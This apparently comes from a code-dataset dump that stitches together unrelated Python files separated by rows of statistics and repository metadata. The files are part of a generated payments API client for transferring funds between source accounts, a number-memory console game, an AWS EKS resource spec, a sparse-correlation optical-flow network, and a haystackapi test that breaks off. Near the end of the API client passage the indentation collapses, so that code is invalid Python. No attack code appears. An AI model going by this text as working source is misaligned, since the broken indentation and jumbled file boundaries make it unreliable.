            body_params = local_var_params['set_notifications_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/v1/sourceAccounts/{sourceAccountId}/notifications', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def transfer_funds(self, source_account_id, transfer_request, **kwargs):  # noqa: E501
        """Transfer Funds between source accounts  # noqa: E501

        Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.transfer_funds(source_account_id, transfer_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: The 'from' source account id, which will be debited (required)
        :param TransferRequest transfer_request: Body (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.transfer_funds_with_http_info(source_account_id, transfer_request, **kwargs)  # noqa: E501
    def transfer_funds_with_http_info(self, source_account_id, transfer_request, **kwargs):  # noqa: E501
        """Transfer Funds between source accounts  # noqa: E501

        Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.transfer_funds_with_http_info(source_account_id, transfer_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: The 'from' source account id, which will be debited (required)
        :param TransferRequest transfer_request: Body (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['source_account_id', 'transfer_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method transfer_funds" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'source_account_id' is set
        if ('source_account_id' not in local_var_params or
                local_var_params['source_account_id'] is None):
            raise ApiValueError("Missing the required parameter `source_account_id` when calling `transfer_funds`")  # noqa: E501
        # verify the required parameter 'transfer_request' is set
        if ('transfer_request' not in local_var_params or
                local_var_params['transfer_request'] is None):
            raise ApiValueError("Missing the required parameter `transfer_request` when calling `transfer_funds`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'source_account_id' in local_var_params:
            path_params['sourceAccountId'] = local_var_params['source_account_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'transfer_request' in local_var_params:
            body_params = local_var_params['transfer_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/v2/sourceAccounts/{sourceAccountId}/transfers', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
    def transfer_funds_v3(self, source_account_id, transfer_request2, **kwargs):  # noqa: E501
        """Transfer Funds between source accounts  # noqa: E501

        Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.transfer_funds_v3(source_account_id, transfer_request2, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: The 'from' source account id, which will be debited (required)
        :param TransferRequest2 transfer_request2: Body (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.transfer_funds_v3_with_http_info(source_account_id, transfer_request2, **kwargs)  # noqa: E501
    def transfer_funds_v3_with_http_info(self, source_account_id, transfer_request2, **kwargs):  # noqa: E501
        """Transfer Funds between source accounts  # noqa: E501

        Transfer funds between source accounts for a Payor. The 'from' source account is identified in the URL, and is the account which will be debited. The 'to' (destination) source account is in the body, and is the account which will be credited. Both source accounts must belong to the same Payor. There must be sufficient balance in the 'from' source account, otherwise the transfer attempt will fail.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.transfer_funds_v3_with_http_info(source_account_id, transfer_request2, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str source_account_id: The 'from' source account id, which will be debited (required)
        :param TransferRequest2 transfer_request2: Body (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['source_account_id', 'transfer_request2']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method transfer_funds_v3" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'source_account_id' is set
        if ('source_account_id' not in local_var_params or
                local_var_params['source_account_id'] is None):
            raise ApiValueError("Missing the required parameter `source_account_id` when calling `transfer_funds_v3`")  # noqa: E501
        # verify the required parameter 'transfer_request2' is set
        if ('transfer_request2' not in local_var_params or
                local_var_params['transfer_request2'] is None):
            raise ApiValueError("Missing the required parameter `transfer_request2` when calling `transfer_funds_v3`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'source_account_id' in local_var_params:
            path_params['sourceAccountId'] = local_var_params['source_account_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'transfer_request2' in local_var_params:
            body_params = local_var_params['transfer_request2']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}/transfers', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 53.57685 | 4,651 | 0.638082 | 13,464 | 112,940 | 5.104575 | 0.037062 | 0.041904 | 0.066407 | 0.022116 | 0.923888 | 0.91769 | 0.912743 | 0.905206 | 0.899924 | 0.893813 | 0 | 0.018773 | 0.288286 | 112,940 | 2,107 | 4,652 | 53.602278 | 0.836242 | 0.475713 | 0 | 0.778238 | 0 | 0.017617 | 0.246453 | 0.068215 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036269 | false | 0 | 0.005181 | 0 | 0.07772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c364457f89e057ef9df9901828c96b701916df9e | 2,242 | py | Python | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | import random
from os import system, name
from time import sleep

def clear():
    # 'cls' clears the console on Windows, 'clear' on POSIX systems
    # (the original only handled Windows, so the digits never disappeared elsewhere)
    _ = system('cls' if name == 'nt' else 'clear')


def choose_difficulty():
    """Return how many seconds the digits stay on screen for the chosen difficulty."""
    times = {"a": 2.25, "b": 1.75, "c": 1.25, "d": 0.75}
    choice = input("Choose your difficulty!\na)Easy\nb)Medium\nc)Hard\nd)Impossible\n")
    while choice not in times:
        print("Invalid input.")
        choice = input("Choose your difficulty!\na)Easy\nb)Medium\nc)Hard\nd)Impossible\n")
    return times[choice]


def play():
    """Run one game: show a growing number briefly, ask the player to repeat it."""
    n = choose_difficulty()
    digits = [random.randint(1, 9)]
    level = 1
    sleep(1)
    clear()
    x = ''.join(str(e) for e in digits)
    print(x)
    sleep(n)
    clear()
    y = input("Number: ")
    clear()
    while x == y:
        digits = [random.randint(1, 9) for _ in range(level + 1)]
        x = ''.join(str(e) for e in digits)
        print(x)
        sleep(n)
        clear()
        y = input("Number: ")
        clear()
        level += 1
    print("You lost!")
    print("Your score was: " + str(level - 1))
    sleep(2)
    clear()


play()
AGAIN = input("Do you want to play again?\nEnter Y for YES or N for NO\n")
clear()
while AGAIN == "Y":
    play()
    AGAIN = input("Do you want to play again?\nEnter Y for YES or N for NO\n")
    clear()
exit() | 21.352381 | 90 | 0.486173 | 333 | 2,242 | 3.24024 | 0.219219 | 0.064875 | 0.061168 | 0.050046 | 0.86747 | 0.86747 | 0.84152 | 0.84152 | 0.84152 | 0.84152 | 0 | 0.029006 | 0.354148 | 2,242 | 105 | 91 | 21.352381 | 0.71616 | 0 | 0 | 0.844444 | 0 | 0.022222 | 0.172043 | 0.049556 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0 | 0.033333 | 0 | 0.044444 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c36cdb6c265cff308a1cdc3f2c508c6d6d891a60 | 238 | py | Python | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 48 | 2019-11-06T03:20:53.000Z | 2022-02-22T21:10:45.000Z | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 27 | 2020-01-07T23:48:30.000Z | 2022-02-26T00:24:04.000Z | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 21 | 2019-12-20T03:06:35.000Z | 2021-12-15T23:26:00.000Z | """AWSResourceSpec subclass for eks resources."""
from altimeter.aws.resource.resource_spec import AWSResourceSpec
class EKSResourceSpec(AWSResourceSpec):
"""AWSResourceSpec subclass for eks resources."""
service_name = "eks"
| 23.8 | 64 | 0.773109 | 24 | 238 | 7.583333 | 0.625 | 0.252747 | 0.285714 | 0.318681 | 0.417582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130252 | 238 | 9 | 65 | 26.444444 | 0.879227 | 0.365546 | 0 | 0 | 0 | 0 | 0.021429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f44eb061ff5b00bfb2f98410ccd8ba502306932 | 12,813 | py | Python | core/sparsenet.py | zacjiang/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 115 | 2021-04-15T14:01:30.000Z | 2022-03-30T02:54:04.000Z | core/sparsenet.py | jiaw-z/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 4 | 2021-06-17T19:50:21.000Z | 2021-12-22T06:30:20.000Z | core/sparsenet.py | jiaw-z/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 14 | 2021-06-13T13:59:17.000Z | 2022-03-28T13:34:35.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from extractor import BasicEncoder, BasicEncoderQuarter
from update import BasicUpdateBlock, BasicUpdateBlockQuarter
from utils.utils import bilinear_sampler, coords_grid, coords_grid_y_first,\
    upflow4, compute_interpolation_weights
from knn import knn_faiss_raw
autocast = torch.cuda.amp.autocast
def compute_sparse_corr(fmap1, fmap2, k=32):
    """
    Compute a cost volume containing the k-largest hypotheses for each pixel.
    Output: corr_mink
    """
    B, C, H1, W1 = fmap1.shape
    H2, W2 = fmap2.shape[2:]
    N = H1 * W1

    fmap1, fmap2 = fmap1.view(B, C, -1), fmap2.view(B, C, -1)

    with torch.no_grad():
        _, indices = knn_faiss_raw(fmap1, fmap2, k)  # [B, k, H1*W1]

        indices_coord = indices.unsqueeze(1).expand(-1, 2, -1, -1)  # [B, 2, k, H1*W1]
        coords0 = coords_grid_y_first(B, H2, W2).view(B, 2, 1, -1).expand(-1, -1, k, -1).to(fmap1.device)  # [B, 2, k, H1*W1]
        coords1 = coords0.gather(3, indices_coord)  # [B, 2, k, H1*W1]
        coords1 = coords1 - coords0

        # Append batch index
        batch_index = torch.arange(B).view(B, 1, 1, 1).expand(-1, -1, k, N).type_as(coords1)

    # Gather by indices from map2 and compute correlation volume
    fmap2 = fmap2.gather(2, indices.view(B, 1, -1).expand(-1, C, -1)).view(B, C, k, N)
    corr_sp = torch.einsum('bcn,bckn->bkn', fmap1, fmap2).contiguous() / torch.sqrt(torch.tensor(C).float())  # [B, k, H1*W1]

    return corr_sp, coords0, coords1, batch_index  # coords: [B, 2, k, H1*W1]
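# The dense-to-sparse idea above — keep only the k best matches per pixel
# instead of a full H1*W1 x H2*W2 cost volume — can be sketched in plain
# Python, independent of FAISS or CUDA. `topk_matches` is a hypothetical
# illustration helper, not part of this repository:

```python
# Toy sketch of the "k-largest hypotheses per pixel" idea behind
# compute_sparse_corr. The real code runs FAISS k-NN over GPU feature
# vectors; here we simply sort one pixel's correlation row and keep
# the top-k (index, score) pairs.

def topk_matches(corr_row, k):
    """Return the k largest (index, score) pairs of one correlation row."""
    return sorted(enumerate(corr_row), key=lambda p: p[1], reverse=True)[:k]

best = topk_matches([0.1, 0.9, 0.3, 0.7], k=2)
# best == [(1, 0.9), (3, 0.7)]
```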
class FlowHead(nn.Module):
    def __init__(self, input_dim=256, batch_norm=True):
        super().__init__()
        if batch_norm:
            self.flowpredictor = nn.Sequential(
                nn.Conv2d(input_dim, 128, 3, padding=1),
                nn.BatchNorm2d(128),
                nn.ReLU(inplace=True),
                nn.Conv2d(128, 64, 3, padding=1),
                nn.BatchNorm2d(64),
                nn.ReLU(inplace=True),
                nn.Conv2d(64, 2, 3, padding=1)
            )
        else:
            self.flowpredictor = nn.Sequential(
                nn.Conv2d(input_dim, 128, 3, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(128, 64, 3, padding=1),
                nn.ReLU(inplace=True),
                nn.Conv2d(64, 2, 3, padding=1)
            )

    def forward(self, x):
        return self.flowpredictor(x)
class SparseNet(nn.Module):
    def __init__(self, args):
        super().__init__()
        self.args = args

        # feature network, context network, and update block
        self.fnet = BasicEncoderQuarter(output_dim=256, norm_fn='instance', dropout=False)
        self.cnet = BasicEncoderQuarter(output_dim=256, norm_fn='batch', dropout=False)

        # correlation volume encoder
        self.update_block = BasicUpdateBlockQuarter(self.args, hidden_dim=128, input_dim=405)

    def initialize_flow(self, img):
        """ Flow is represented as difference between two coordinate grids flow = coords1 - coords0"""
        N, C, H, W = img.shape
        coords0 = coords_grid(N, H//4, W//4).to(img.device)
        coords1 = coords_grid(N, H//4, W//4).to(img.device)

        # optical flow computed as difference: flow = coords1 - coords0
        return coords0, coords1
    def upsample_flow_quarter(self, flow, mask):
        """ Upsample flow field [H/4, W/4, 2] -> [H, W, 2] using convex combination """
        N, _, H, W = flow.shape
        mask = mask.view(N, 1, 9, 4, 4, H, W)
        mask = torch.softmax(mask, dim=2)

        up_flow = F.unfold(4 * flow, [3, 3], padding=1)
        up_flow = up_flow.view(N, 2, 9, 1, 1, H, W)

        up_flow = torch.sum(mask * up_flow, dim=2)
        up_flow = up_flow.permute(0, 1, 4, 2, 5, 3)
        return up_flow.reshape(N, 2, 4*H, 4*W)
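# The convex-combination upsampling above reduces, per output pixel, to a
# softmax-weighted average of coarse 3x3 neighbours. A scalar toy sketch
# (hypothetical helper name, plain Python rather than the torch tensors
# used above) makes the "convex" part concrete — the result always lies
# within the range of its inputs:

```python
# Scalar sketch of convex-combination upsampling: the learned mask logits
# are softmax-normalised, so every upsampled value is a weighted average
# of coarse neighbours and can never leave their value range.
import math

def convex_combination(values, logits):
    weights = [math.exp(l) for l in logits]
    total = sum(weights)
    return sum(v * w / total for v, w in zip(values, weights))

out = convex_combination([1.0, 2.0, 3.0], [0.0, 0.0, 0.0])
# equal logits give equal weights, i.e. a plain average: out == 2.0
```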
    def forward(self, image1, image2, iters, flow_init=None, test_mode=False):
        """ Estimate optical flow between pair of frames """
        image1 = 2 * (image1 / 255.0) - 1.0
        image2 = 2 * (image2 / 255.0) - 1.0

        image1 = image1.contiguous()
        image2 = image2.contiguous()

        # run the feature and context network
        with autocast(enabled=self.args.mixed_precision):
            fmap1, fmap2 = self.fnet([image1, image2])
            cnet = self.cnet(image1)
            net, inp = torch.split(cnet, [128, 128], dim=1)
            net = torch.tanh(net)
            inp = torch.relu(inp)

        fmap1 = fmap1.float()
        fmap2 = fmap2.float()

        B, _, H1, W1 = fmap1.shape

        # GRU
        coords0, coords1 = self.initialize_flow(image1)

        if flow_init is not None:
            coords1 = coords1 + flow_init

        # Generate sparse cost volume for GRU
        corr_val, coords0_cv, coords1_cv, batch_index_cv = compute_sparse_corr(fmap1, fmap2, k=self.args.num_k)

        delta_flow = torch.zeros_like(coords0)
        flow_predictions = []
        search_range = 4

        corr_val = corr_val.repeat(1, 4, 1)

        for itr in range(iters):
            with torch.no_grad():
                # need to switch order of delta_flow, also note the minus sign
                coords1_cv = coords1_cv - delta_flow[:, [1, 0], :, :].view(B, 2, 1, -1)  # [B, 2, k, H1*W1]

                mask_pyramid = []
                weights_pyramid = []
                coords_sparse_pyramid = []

                # Create multi-scale displacements
                for i in range(5):
                    coords1_sp = coords1_cv * 0.5**i
                    weights, coords1_sp = compute_interpolation_weights(coords1_sp)
                    mask = (coords1_sp[:, 0].abs() <= search_range) & (coords1_sp[:, 1].abs() <= search_range)
                    batch_ind = batch_index_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
                    coords0_sp = coords0_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
                    coords1_sp = coords1_sp.permute(0, 2, 3, 1)[mask]
                    coords1_sp = coords1_sp + search_range

                    coords_sp = torch.cat([batch_ind, coords0_sp, coords1_sp], dim=1)

                    coords_sparse_pyramid.append(coords_sp)
                    mask_pyramid.append(mask)
                    weights_pyramid.append(weights)

            corr_val_pyramid = []
            for mask, weights in zip(mask_pyramid, weights_pyramid):
                corr_masked = (weights * corr_val)[mask].unsqueeze(1)
                corr_val_pyramid.append(corr_masked)

            sparse_tensor_pyramid = [torch.sparse.FloatTensor(coords_sp.t().long(), corr_resample, torch.Size([B, H1, W1, 9, 9, 1])).coalesce()
                                     for coords_sp, corr_resample in zip(coords_sparse_pyramid, corr_val_pyramid)]

            corr = torch.cat([sp.to_dense().view(B, H1, W1, -1) for sp in sparse_tensor_pyramid], dim=3).permute(0, 3, 1, 2)

            coords1 = coords1.detach()
            flow = coords1 - coords0

            # GRU Update
            with autocast(enabled=self.args.mixed_precision):
                # 4D net map to 2D dense vector
                net, up_mask, delta_flow = self.update_block(net, inp, corr, flow)

            # F(t+1) = F(t) + \Delta(t)
            coords1 = coords1 + delta_flow

            # upsample predictions
            if up_mask is None:
                flow_up = upflow4(coords1 - coords0)
            else:
                flow_up = self.upsample_flow_quarter(coords1 - coords0, up_mask)

            flow_predictions.append(flow_up)

        if test_mode:
            return flow_up

        return flow_predictions
class SparseNetEighth(nn.Module):
    def __init__(self, args):
        super().__init__()
        self.args = args

        # feature network, context network, and update block
        self.fnet = BasicEncoder(output_dim=256, norm_fn='instance', dropout=False)
        self.cnet = BasicEncoder(output_dim=256, norm_fn='batch', dropout=False)

        # correlation volume encoder
        self.update_block = BasicUpdateBlock(self.args, hidden_dim=128, input_dim=405)

    def initialize_flow(self, img):
        """ Flow is represented as difference between two coordinate grids flow = coords1 - coords0"""
        N, C, H, W = img.shape
        coords0 = coords_grid(N, H//8, W//8).to(img.device)
        coords1 = coords_grid(N, H//8, W//8).to(img.device)

        # optical flow computed as difference: flow = coords1 - coords0
        return coords0, coords1

    def upsample_flow(self, flow, mask):
        """ Upsample flow field [H/8, W/8, 2] -> [H, W, 2] using convex combination """
        N, _, H, W = flow.shape
        mask = mask.view(N, 1, 9, 8, 8, H, W)
        mask = torch.softmax(mask, dim=2)

        up_flow = F.unfold(8 * flow, [3, 3], padding=1)
        up_flow = up_flow.view(N, 2, 9, 1, 1, H, W)

        up_flow = torch.sum(mask * up_flow, dim=2)
        up_flow = up_flow.permute(0, 1, 4, 2, 5, 3)
        return up_flow.reshape(N, 2, 8*H, 8*W)

    def forward(self, image1, image2, iters, flow_init=None, test_mode=False):
        """ Estimate optical flow between pair of frames """
        image1 = 2 * (image1 / 255.0) - 1.0
        image2 = 2 * (image2 / 255.0) - 1.0

        image1 = image1.contiguous()
        image2 = image2.contiguous()

        # run the feature and context network
        with autocast(enabled=self.args.mixed_precision):
            fmap1, fmap2 = self.fnet([image1, image2])
            cnet = self.cnet(image1)
            net, inp = torch.split(cnet, [128, 128], dim=1)
            net = torch.tanh(net)
            inp = torch.relu(inp)

        fmap1 = fmap1.float()
        fmap2 = fmap2.float()

        B, _, H1, W1 = fmap1.shape

        # GRU
        coords0, coords1 = self.initialize_flow(image1)

        if flow_init is not None:
            coords1 = coords1 + flow_init

        # Generate sparse cost volume for GRU
        corr_val, coords0_cv, coords1_cv, batch_index_cv = compute_sparse_corr(fmap1, fmap2, k=self.args.num_k)

        delta_flow = torch.zeros_like(coords0)
        flow_predictions = []
        search_range = 4

        corr_val = corr_val.repeat(1, 4, 1)

        for itr in range(iters):
            with torch.no_grad():
                # need to switch order of delta_flow, also note the minus sign
                coords1_cv = coords1_cv - delta_flow[:, [1, 0], :, :].view(B, 2, 1, -1)  # [B, 2, k, H1*W1]

                mask_pyramid = []
                weights_pyramid = []
                coords_sparse_pyramid = []

                # Create multi-scale displacements
                for i in range(5):
                    coords1_sp = coords1_cv * 0.5**i
                    weights, coords1_sp = compute_interpolation_weights(coords1_sp)
                    mask = (coords1_sp[:, 0].abs() <= search_range) & (coords1_sp[:, 1].abs() <= search_range)
                    batch_ind = batch_index_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
                    coords0_sp = coords0_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
                    coords1_sp = coords1_sp.permute(0, 2, 3, 1)[mask]
                    coords1_sp = coords1_sp + search_range

                    coords_sp = torch.cat([batch_ind, coords0_sp, coords1_sp], dim=1)

                    coords_sparse_pyramid.append(coords_sp)
                    mask_pyramid.append(mask)
                    weights_pyramid.append(weights)

            corr_val_pyramid = []
            for mask, weights in zip(mask_pyramid, weights_pyramid):
                corr_masked = (weights * corr_val)[mask].unsqueeze(1)
                corr_val_pyramid.append(corr_masked)

            sparse_tensor_pyramid = [torch.sparse.FloatTensor(coords_sp.t().long(), corr_resample, torch.Size([B, H1, W1, 9, 9, 1])).coalesce()
                                     for coords_sp, corr_resample in zip(coords_sparse_pyramid, corr_val_pyramid)]

            corr = torch.cat([sp.to_dense().view(B, H1, W1, -1) for sp in sparse_tensor_pyramid], dim=3).permute(0, 3, 1, 2)

            coords1 = coords1.detach()
            flow = coords1 - coords0

            # Not sure if it will affect results.
            with autocast(enabled=self.args.mixed_precision):
                # 4D net map to 2D dense vector
                net, up_mask, delta_flow = self.update_block(net, inp, corr, flow)

            # F(t+1) = F(t) + \Delta(t)
            coords1 = coords1 + delta_flow

            # upsample predictions
            if up_mask is None:
                flow_up = upflow4(coords1 - coords0)
            else:
                flow_up = self.upsample_flow(coords1 - coords0, up_mask)

            flow_predictions.append(flow_up)

        if test_mode:
            return flow_up

        return flow_predictions
| 38.020772 | 143 | 0.574807 | 1,714 | 12,813 | 4.128355 | 0.135939 | 0.025438 | 0.005653 | 0.00424 | 0.837761 | 0.83013 | 0.810345 | 0.801865 | 0.798474 | 0.798474 | 0 | 0.056238 | 0.3075 | 12,813 | 336 | 144 | 38.133929 | 0.741237 | 0.120425 | 0 | 0.741627 | 0 | 0 | 0.003488 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.033493 | 0.004785 | 0.148325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f79bfc127d88a5ee649969ffe4362b39279ca70 | 2,046 | py | Python | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | from unittest.mock import patch
import haystackapi
from haystackapi import Ref
from haystackapi.ops import HaystackHttpRequest
from haystackapi.providers import ping
@patch.dict('os.environ', {'HAYSTACK_PROVIDER': 'haystackapi.providers.ping'})
@patch.object(ping.Provider, 'invoke_action')
def test_invoke_action_with_zinc(mock) -> None:
    # GIVEN
    mock.return_value = ping.PingGrid
    mime_type = haystackapi.MODE_ZINC
    request = HaystackHttpRequest()
    grid = haystackapi.Grid(metadata={'id': Ref('123'), 'action': 'doIt'},
                            columns={'key': {}, 'value': {}})
    grid.append({'param': 'value'})
    request.headers["Content-Type"] = mime_type
    request.headers["Accept"] = mime_type
    request.body = haystackapi.dump(grid, mode=haystackapi.MODE_ZINC)

    # WHEN
    response = haystackapi.invoke_action(request, "dev")

    # THEN
    mock.assert_called_once_with(Ref("123"), "doIt", {})
    assert response.status_code == 200
    assert response.headers["Content-Type"].startswith(mime_type)
    assert haystackapi.parse(response.body, haystackapi.MODE_ZINC) is not None


@patch.dict('os.environ', {'HAYSTACK_PROVIDER': 'haystackapi.providers.ping'})
